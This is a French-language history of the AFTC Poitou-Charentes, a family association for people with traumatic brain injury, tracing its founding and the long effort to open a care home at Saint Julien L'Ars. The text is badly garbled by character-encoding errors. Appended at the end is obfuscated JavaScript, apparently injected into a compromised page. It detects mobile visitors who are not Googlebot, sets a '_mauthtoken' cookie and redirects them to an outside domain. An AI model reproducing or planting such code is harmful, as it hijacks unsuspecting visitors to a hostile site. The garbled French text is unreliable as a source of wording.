Il y a un peu moins de vingt ans,A�l’assistante sociale du centre de rA�A�ducation Maurice Salles attenant au CHU de Poitiers, mit en contact cinq ou six familles touchA�es par le traumatisme crA?nien da��un de leur proche. Ces familles dA�cidA?rent de crA�er une association comme il en existait dA�jA� A� BordeauxA�: la��AFTC VIENNE-DEUX SEVRES voyait alors le jour sous l’A�gide deA� Mme CASTETS qui, lors du premier CA,A� fut dA�signA�e prA�sidente de cette toute jeune association.

Le nombre de blessA�s survivant A� leur blessures croissant, une question se posaitA�: oA? mettre tous ces blessA�s qui avaient perdu leur autonomieA�? En effet, A� la��A�poque, la prise en charge des blessA�s sa��effectuait lA� oA? il y avait de la placeA�: hA?pital psychiatrique, maison de retraite, MAS, ou foyers pour handicapA�s mentaux. Ceci entraA�nait une rA�action des familles qui na��acceptaient pas que leurs blessA�s soient considA�rA�s comme des malades mentaux. La premiA?re AFTC vit le jour A� Bordeaux et essaima un peu partout en France. En 1986, la��UNAFTC fA�dA�ra les AFTC de France.

Il A�tait donc difficile de faire comprendre que le TC na��A�tait pas une maladie mentale et tout le travail des fondateurs de la��association consista A� faire connaA�tre aux pouvoirs publics la spA�cificitA� de ce handicap. On A�coutait, mais on na��entendait pas.

Ca��est le rapport de la��inspecteur gA�nA�ral LEBEAU ( rapport nA� 95075 de mai 1995), commandA� par la Ministre da��A�tat, Ministre des Affaires Sociales , de la SantA� et de la Ville Mme Simone Veil, qui marqua le dA�but de la reconnaissance de la spA�cificitA� du TC, et de ce qui, par la suite, allait sa��appeler A�A�Le handicap invisibleA�A�.

Le congrA?s UNAFTC de Vincennes en 1995, auquel participA?rent des membres de la��association, marqua un tournant dans leur rapport avec les administrations. La notion de structures spA�cifiques pour TC faisait son chemin, mais alors se posa la question du nombre de TC concernA�s. Combien A�taient-ilsA�?

La��extrapolation da��une A�tude faite en Aquitaine, recoupA�e avec une A�tude de la��APF permettait de situer le nombre de blessA�s potentiels A� une vingtaine de cas graves par an, ce qui permettait da��A�valuer la demande A� une centaine en se basant sur les cinq derniA?res annA�es.

Les premiers contacts avec la DRASS eurent lieu en 1997. La demande A� la��A�poque concernait ce que la��on appelait un foyer A� double tarification.

A cette A�poque A�galement, la��AFTCA� CHARENTE-POITOU A� AngoulA?me, qui A�tait A� la��origineA� du centre de rA�A�ducation des GLAMOTS , disparutA� suite au dA�cA?s du fils du prA�sident. la��UNAFTC demanda alors de rattacher la Charente A� la��AFTC VIENNE-DEUX SEVRES, qui devint alors la��AFTC POITOU-CHARENTES. Cette dimension rA�gionale, souhaitA�e A�galement par la DRASS fitA� de la petite association de dA�part une association couvrantA� les quatre dA�partements.

En juillet 1997, une rA�union se tint au cours de laquelle laA� DDASS prA�cisa qua��aucune dA�cision ne serait prise tant qua��une A�tude A�pidA�miologique ne soit menA�e, A�tude confiA�e A� la��ORS qui prA�senta ses rA�sultats en 1999 au comitA� technique rA�gional.

Sur les conseils de la��UNAFTC, les premiers contacts A�taientA�pris avec ADEF RA�sidence (association qui construit et gA?re des foyers). Un premier projet de foyerA� de 30 places A�tait prA�sentA� A� la DDASS le 18 mai 1998. Ca��est A� cette occasion, que les membres de la��association, dA�couvrirent le cloisonnement entre la DDASS(Etat) et la DISS (dA�partement), qui pendant des annA�es ne voulurent pas examiner ensemble le projet ( problA?meA� soulevA� par la partie hA�bergement qui est de la compA�tenceA� du Conseil GA�nA�ral ).

De plus, le caractA?re rA�gional de la��association na��amA�liora guA?re la situation, les autres dA�partements de la RA�gion na��adhA�rant pas au projet pour de multiples raisonsA�: A�A� Votre projet est intA�ressant, mais ce na��est pas notre prioritA�A�A�.

Pendant ce temps-lA�, ailleurs en France, des projets de structures naissaient, soutenus parfois par les A�lus locaux. Le prA�sident de la��UNAFTC A�tait en contact avec les ministA?res concernA�s, successivement A� droite comme A� gauche.

En 2001, aprA?s de multiples rebondissements,A� da��espoirs dA�A�us, la reconnaissance de la problA�matique spA�cifique posA�e par les traumatisA�s crA?niens A�tait enfin prise en compte au niveau deA� la RA�gionA�: une structure de 15 places en foyer A� double tarification (FDT)A� et 15 places en MAS A�tait inscrite dans le schA�ma rA�gional. Les administrateurs y ajouteront un accueil de jour.

Les discussion reprirent avec A�A�ADEF RA�sidencesA�A�.

Fin 2002, la localisation de la structure A� ST Julien La��Ars se concrA�tisait.

En juillet 2006, ce fut la date da��obtention des arrA?tA�s autorisant la rA�alisation du projet.

Une derniA?re rA�union rA�unissant la DDASS, DISS, ADEF et la��AFTC en mai 2006 permit de confirmer point par point que la��estimation des dA�penses correspondait bien au budget. A la��issue de cette rA�union historique, les autorisations furent dA�livrA�es avant la��A�tA�.

A�A�En octobre 2010, la structure FAM/MAS de Saint Julien La��Ars , appelA�e A�A�La Maison de la ForA?t des CharmesA�A� accueillait ses premiers rA�sidants.A�

Jean BOURGEOIS, prA�sident de la��AFTC POITOU-CHARENTES de la��A�poque, Monique CASTETS, A� la��origine du projet et administratrice de la premiA?re heure, et Jacques LEBLANC, prA�sident de 2010 A� 2013, seront les reprA�sentants AFTC qui auront A�uvrA� pendant des annA�es pour que ce projet aboutisse.

A�Pendant ce temps-lA�, avec la��aide des adhA�rents volontaires, des permanences serontA� tenues, de maniA?re hebdomadaireA� au local AFTC de Poitiers, A� Royan,A� une fois par mois, pour A�changer, apporter un soutien juridique, psychologique aux familles touchA�es par la pathologie du traumatisme crA?nien. On se rappellera des concours organisA�s par StA�phane Marnay, la visite du site archA�ologique de Bougon, les goA�ters-crA?pes A� Celles, le voyage sur la��A�le de RA�, la journA�e en Charente Maritime organisA�e par M. et Mme Platon ou la tombola A� Cognac.

En 2006, les DIX ANS de la��AFTC A�taient organisA�s de main de maA�tre par M. et Mme TEXIER A� PayrA� dans la Vienne.

10 A?me anniversaire

10 A?me anniversaire

Dans le mA?me temps, les demandes des institutions pour assurer la reprA�sentation des usagers au sein de diffA�rentes structuresA� mA�dicalesA� se sont multipliA�es. Les administrateurs obtiennent alors auprA?s de la DRASS leurs agrA�ments pour reprA�senter les associations da��usagers du systA?me de santA�. Ils siA?gentA� dans un certain nombre da��instances dA�partementales et .rA�gionales. Leur expertise est maintenant connue et reconnue.

En 2011, la��UNAFTC A�tend son action aux familles de cA�rA�brolA�sA�s. Les AFTC adaptent leurs statuts afinA� da��accueillir toute famille atteinte par la pathologie de laA� lA�sion cA�rA�brale acquise.A�

Le CA, rA�uni en juin 2013, sa��oriente vers une plus grande autonomie des antennes dA�partementales, vers un renforcement de sa reprA�sentation au niveau de chaque instance dA�cisionnelle, qua��elle soit dA�partementale ou rA�gionale. Deux gros projets sont en coursA�: la crA�ation da��un site internet pour la��association et un projet de A�A�logements accompagnA�sA�A�, comme cela existe dans da��autres rA�gions.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}